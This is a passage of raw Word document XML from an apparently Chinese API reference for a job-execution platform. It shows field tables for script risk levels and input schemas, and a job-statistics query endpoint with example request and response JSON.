          <w:p w14:paraId="6DFE5F29" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>executeSeverity</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="52959151" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4EF4C025" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1E7C1E9D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>检测脚本执行风险，0：无风险，1：低风险，2：中风险，3：高风险</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="786E5E87" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4F112A23" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>updateTime</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="608A53F5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="35C3D6A4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="350E15FD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>更新时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="3230D9B9" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3D2D5628" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>inputSchemas</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0F4F12C7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="67901264" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1D1E65B7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>输入参数定义</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="171D698C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>返回rows中</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>inputSchemas</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>部分说明</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1474"/>
        <w:gridCol w:w="1006"/>
        <w:gridCol w:w="1545"/>
        <w:gridCol w:w="1201"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="4823523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E66E371" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2C30601C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="56E3E7E4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0043E7E1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="25D576D0" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0E16F483" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="21AEFB3E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="50E92F19" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>64)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1CC0A70E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>参数名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="27AAC841" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="093BE248" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>displayName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="59649A07" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0375EF64" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>255)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5E6D7192" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>参数中文名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="672D8AD6" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5DD133C3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>caption</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3DBBAAFD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="639B7C02" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5EF1393C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>参数说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="06029628" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="59341DFD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>required</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3F6F627B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2F21CDEB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3EE583EB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是否必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="43C85A8B" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2C473075" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>defaultValue</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="421ACD9F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="194F33CA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0E829CDC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>参数默认值</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7846704B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="247" w:name="_Toc115166198"/>
      <w:bookmarkStart w:id="248" w:name="作业执行基本信息查询"/>
      <w:bookmarkEnd w:id="246"/>
      <w:r>
        <w:t>作业执行基本信息查询</w:t>
      </w:r>
      <w:bookmarkEnd w:id="247"/>
    </w:p>
    <w:p w14:paraId="414ED95E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08F5C930"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stats</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5833E857"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74"/>
        <w:gridCol w:w="896"/>
        <w:gridCol w:w="4087"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="1CE1C21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A652A65" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="761847E5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1C8B08EA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="636A4E33" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1BDEBD7A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>jobId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4B17A6BE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6564B46B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>必传</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="651F7291" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0046F8DC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>jobType</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3DC5CCD7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6850216E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>必传，作业类型：1：全局作业 2：用户作业</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="027B1D50" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48204A79"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stats</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>{"jobId":"5b8dfe107d761b471404112d","jobType":2}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19D5D795" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BBC2E85" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>jobId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "5b8dfe107d761b471404112d",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>jobName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>testt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>createTime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "2018-09-04 11:37:52",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>executeJobId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "5b9b327c1522e85a802faa34",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>executeStatus</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 3,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lastExecuteTime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "2018-09-14 12:01:00",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "duration": 0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vulCount</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hostCount</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>taskCount</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>successHostCount</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>failedHostCount</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 0</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D51716B"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926"/>
        <w:gridCol w:w="777"/>
        <w:gridCol w:w="7379"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="2BD2407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878EC2F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5209D0DE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5D9EAFFC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="0F5A84DC" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3C011BD5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>jobId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1195901A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="31C5E121" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>作业id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1B7EB939" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1EA7A58B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>jobName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="20869320" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="65C6ECFE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>作业名称</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="2BE61E78" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6794773A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>createTime</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="45AEDCC3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="605805DF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>创建时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1C779B1D" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
